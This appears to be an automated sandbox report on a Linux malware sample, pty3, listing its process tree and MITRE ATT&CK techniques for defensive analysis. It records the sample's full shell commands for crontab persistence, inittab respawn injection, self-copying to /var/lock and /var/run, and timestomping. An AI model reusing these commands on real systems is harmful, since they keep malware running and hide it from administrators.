MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5297 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5297 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /var/lock/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5298 Parent PID: 5297

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5298 Parent PID: 5297

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /var/lock/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5299 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5301 Parent PID: 5299

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5301 Parent PID: 5299

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/lock/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5304 Parent PID: 5301

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5304 Parent PID: 5301

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5305 Parent PID: 5301

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5305 Parent PID: 5301

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/lock/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5306 Parent PID: 5301

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5306 Parent PID: 5301

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5307 Parent PID: 5301

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5309 Parent PID: 5307

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5309 Parent PID: 5307

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5308 Parent PID: 5301

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5308 Parent PID: 5301

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5300 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5300 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/lock/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5302 Parent PID: 5300

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5302 Parent PID: 5300

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5303 Parent PID: 5300

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5303 Parent PID: 5300

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/lock/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5310 Parent PID: 5251

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5310 Parent PID: 5251

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5311 Parent PID: 5251

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5311 Parent PID: 5251

General

Start time:	11:31:23
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5312 Parent PID: 5311

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5312 Parent PID: 5311

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5313 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5313 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5314 Parent PID: 5313

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5314 Parent PID: 5313

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5315 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5315 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5316 Parent PID: 5315

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5316 Parent PID: 5315

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5317 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5317 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /var/run/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5318 Parent PID: 5317

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5318 Parent PID: 5317

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /var/run/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5319 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5321 Parent PID: 5319

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5321 Parent PID: 5319

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/run/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5324 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5324 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5325 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5325 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/run/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5326 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5326 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5328 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5331 Parent PID: 5328

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5331 Parent PID: 5328

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5330 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5330 Parent PID: 5321

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5320 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5320 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/run/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5322 Parent PID: 5320

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5322 Parent PID: 5320

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5323 Parent PID: 5320

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5323 Parent PID: 5320

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/run/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5327 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5327 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5329 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5329 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5332 Parent PID: 5329

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5332 Parent PID: 5329

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5333 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5333 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5334 Parent PID: 5333

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5334 Parent PID: 5333

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5335 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5335 Parent PID: 5251

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5336 Parent PID: 5335

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5336 Parent PID: 5335

General

Start time:	11:31:24
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5253 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5254 Parent PID: 5253

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5254 Parent PID: 5253

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "/bin/uname -n"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5256 Parent PID: 5254

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: uname PID: 5256 Parent PID: 5254

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/uname
Arguments:	/bin/uname -n
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report pty3

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

IRC Packets

System Behavior

Analysis Process: pty3 PID: 5223 Parent PID: 5118

General

Analysis Process: pty3 PID: 5224 Parent PID: 5223

General

Analysis Process: sh PID: 5224 Parent PID: 5223

General

Analysis Process: sh PID: 5225 Parent PID: 5224

General

Analysis Process: pidof PID: 5225 Parent PID: 5224

General

Analysis Process: pty3 PID: 5226 Parent PID: 5223

General

Analysis Process: sh PID: 5226 Parent PID: 5223

General

Analysis Process: sh PID: 5227 Parent PID: 5226

General

Analysis Process: pidof PID: 5227 Parent PID: 5226

General

Analysis Process: pty3 PID: 5230 Parent PID: 5223